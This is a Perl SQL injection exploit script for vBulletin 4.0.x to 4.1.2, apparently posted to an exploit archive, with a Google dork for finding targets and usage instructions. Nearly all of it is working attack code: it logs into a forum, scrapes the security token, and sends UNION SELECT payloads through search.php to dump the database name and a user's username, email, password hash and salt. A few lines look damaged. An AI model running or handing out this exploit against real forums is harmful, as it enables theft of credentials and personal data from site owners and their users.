# vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit # Author: D35m0nd142, # Google Dork: inurl:search.php?search_type=1 # Date: 02/09/2014 # Vendor Homepage: http://www.vbulletin.com/ # Tested on: vBulletin 4.1.2 # Usage: perl exploit.pl # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc # IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'. # Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/) #!/usr/bin/env perl use LWP::UserAgent; use HTTP::Cookies; $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0"); $ua->cookie_jar({}); $username = "username) from user where userid=$ARGV[4]#"; $email = "email) from user where userid=$ARGV[4]#"; $password = "password) from user where userid=$ARGV[4]#"; $salt = "salt) from user where userid=$ARGV[4]#"; @tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt); sub request { my $token = dumping("vbloginout.txt","token"); if($token eq '') { print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n"; #print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n"; $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE print "Attempting using $token as token.\n"; } else { print "SECURITYTOKEN FOUND: $token\n"; } print "Sending exploit...\n\n"; sleep(1); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); break; } #print "Location: $location\n"; my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; print "Do you want to run the second exploitation way? (y/n) -> "; $want = ; if($want =~ /y/) { second_request($token); } } sub second_request { my ($token) = @_ ; print "Attempting using the second exploitation way..\n\n"; sleep(2); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); exit(1); } #print "Location: $location\n"; my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; } sub banner { print "[-] Exploit not successful!\n"; if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303") { print "[i] Try to log in and log out from other any other sessions and run the exploit again.\n\n"; } } sub printout { my ($tofind) = @_ ; if($tofind =~ /username/) { print "[+] User($ARGV[4]) Username: "; } elsif($tofind =~ /password/) { print "[+] User($ARGV[4]) Password: "; } elsif($tofind =~ /database/) { print "[+] Database Name: "; } elsif($tofind =~ /email/) { print "[+] User($ARGV[4]) Email: "; } elsif($tofind =~ /salt/) { print "[+] User($ARGV[4]) Salt: "; } } sub dumping { my ($filename, $par) = @_ ; open(MYFILE,"< ", $filename); my @words; while() { chomp; @words = split(' '); if($par eq "token") { my $ctrl = "n"; foreach my $word (@words) { if($word =~ /SECURITYTOKEN/) { $ctrl = "y"; } if($ctrl eq "y" and $word !~ /=/ and $word !~ /SECURITYTOKEN/) { $word =~ tr/;//d; $word =~ tr/\"//d; return $word; break; } } } elsif($par eq "sql") { foreach my $word (@words) { if($word =~ /:::/) { $word =~ tr/::://d; print "$word"; } } } else { my $ctrl2 = "n"; foreach my $word (@words) { if($word =~ /Location:/) { $ctrl2 = "y"; } if($ctrl2 eq "y" and $word !~ /Location:/) { return $word; } } } } close(MYFILE); } sub login(@) { my $username = shift; my $password = shift; print "\nLogging in...\n"; sleep(1); my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf="); $ua->cookie_jar({}); my $res = $ua->request($req); #print "\n"; print $res->content; print "\n"; open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2); request(); } if($ARGV[0] eq '' || $ARGV[1] eq '' || $ARGV[2] eq '' || $ARGV[3] eq '' || $ARGV[4] eq '') { print "\n 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n\n"; print "Usage: perl exploit.pl < \n"; print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n"; exit(1); } print "\n 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n"; sleep(1); login($ARGV[1],$ARGV[2]); @files = ('vbloginout.txt','vbout.txt','vbloc.txt'); foreach $file (@files) { unlink $file; }